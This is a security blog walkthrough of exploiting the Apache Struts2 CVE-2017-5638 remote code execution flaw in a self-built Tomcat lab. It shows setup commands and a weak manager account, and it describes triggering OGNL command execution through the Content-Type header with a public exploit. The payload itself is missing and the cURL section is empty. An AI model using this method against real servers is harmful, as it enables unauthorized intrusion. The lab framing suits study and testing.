Exploiting The New Apache Struts2 Remote Code Execution [CVE 2017-5638]


A Glance at Apache Struts 2:-

 Apache Struts 2 is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture. The WebWork framework spun off from Apache Struts aiming to offer enhancements and refinements while retaining the same general architecture of the original Struts framework. In December 2005, it was announced that WebWork 2.2 was adopted as Apache Struts 2, which reached its first full release in February 2007.

About CVE 2017-5638:-

Security Researcher have discovered a new Remote Code Execution Vulnerability in Jakarta Multi-part parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 using Object Graph Navigation Language (OGNL) expressions and it is being actively exploited in the wild.

About the Exploit:-

 This vulnerability can be triggered if the attacker sends a modified HTTP request to upload a file to an Apache Server which uses Jakarta Multi-part parser for file upload functionality.

An attacker can executes a malicious command through the “Content-Typeor Content-Length ”HTTP header, As shown in below screenshot.
Exploitation:-

Let’s setup a testbed application and try to exploit the vulnerability on our own server.
  1. Steps includes: -
  2. 1.      Install Apache tomcat server.
  3. 2.      Deploy a vulnerable version on Apache Struts.
  4. 3.      Pwnage.

Installing Tomcat: -

We can install tomcat using apt-get Package Management tool on any Debian distribution.
Note: for this demo, we are using Ubuntu 14.04 Server.

 $ sudo apt-get install tomcat7 tomcat7-admin

 Once the tomcat installation is done, we will need to add a privileged user to upload the apps to Tomcat. This can be achieved by modifying  /etc/tomcat7/tomcat-users.xml file.
Add the below line in /etc/tomcat7/tomcat-users.xml file. (Note: you may need to modify user and password as per your need)

<user username="teampwner" password="teampwner" roles="manager-gui,admin-gui" />

Once done, restart tomcat service.

$ sudo service tomcat restart

Now, you will be able to access Tomcat Web Application Manager on port 8080

http://127.0.0.1:8080/manager/html

Deployment: -

Now we need to deploy vulnerable version of apache Struts. Struts 2.3.15 can be downloaded here.
Extract the zip file, and you will find all the apache Struts files. For the purposes of this blog, we’ll use the struts2-showcase.war demo. This war file in “app” directory of the archive you just downloaded.

Login to the Tomcat Web Application Manager (http://127.0.0.1:8080/manager/html) using the credentials which you have just setup and scroll down to upload section to deploy war file. 


Once the two apps are successfully deployed, they’ll be listed on the manager page under Applications. Click on the link, and you’ll go to the two Struts apps you just deployed.

Pwnage: -

In this section, we will try to exploit this vulnerability using publicly available exploit as well as using cURL.

Using the Exploit: - 

The exploit can be found here
Let’s check if the application is vulnerable or not.


From the exploit’s output, we can determine that the application is indeed vulnerable. Now let’s try to execute some system commands. For the purpose of this blog, we will execute “id” command.


As shown in the above screenshot, we can now execute system commands on target server remotely.

Using cURL: - 

We will use below mention Content-Type value as a payload. 






Credits: -
https://www.cvedetails.com/cve/CVE-2017-5638/
http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
https://en.wikipedia.org/wiki/Apache_Struts_2
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/
https://en.wikipedia.org/wiki/List_of_HTTP_header_fields
http://colesec.inventedtheinternet.com/hacking-apache-struts/

Comments

Post a Comment

Popular posts from this blog

Threat Hunting | Malspam Analysis | Malware Traffic Analysis - MalwareTrafficAnalysis.net Basic

Image
+++++++Please note that we have not attempted to copy anyone nor have we published any copyrighted material however We have tried to compile all the best resources freely available to include it in our investigation+++++++++ Before we proceed with the threat hunting we will see a couple of techniques which will help us in making our job easier while working with Wireshark. ------------------------------------------------------------------------------------------------------------------------------------- How to add server/host names to columns for the Wireshark? ------------------------------------------------------------------------------------------------------------------------------------- Open Wireshark with any captured packets file(.pcap). Before starting hunt for critical data always make sure the time format is selected as per the incidence reported. This will help you in track the time status of the infection for the pre and post stages. Here w...
Read more

IoT Firmware Analysis!!!

Image
A simple tutorial you can follow if you are new to the IoT world and firmware analysis. There are various videos as well you can refer to, just what to accept from all of them is the logic behind what is needed and what to look for. Step 1 - We begin by downloading the firmware from below link which belongs to a simple D-Link router, this can also be downloaded from vendors official website: https://github.com/praetorian-inc/DVRF/blob/master/Firmware/DVRF_v03.bin  Step 2 - We can use any tool which is capable of  ".bin" extraction.We will be using the "Binwalk" tool with  below command for analyzing the file system type. For a complete list of file systems, please refer to this link:  http://elinux.org/File_Systems . binwalk file.bin Step 3 - What we identify from simple binwalk is the file system and the address from where the file systems start which in our case is "1648424"The next step now would be to extract the file system us...
Read more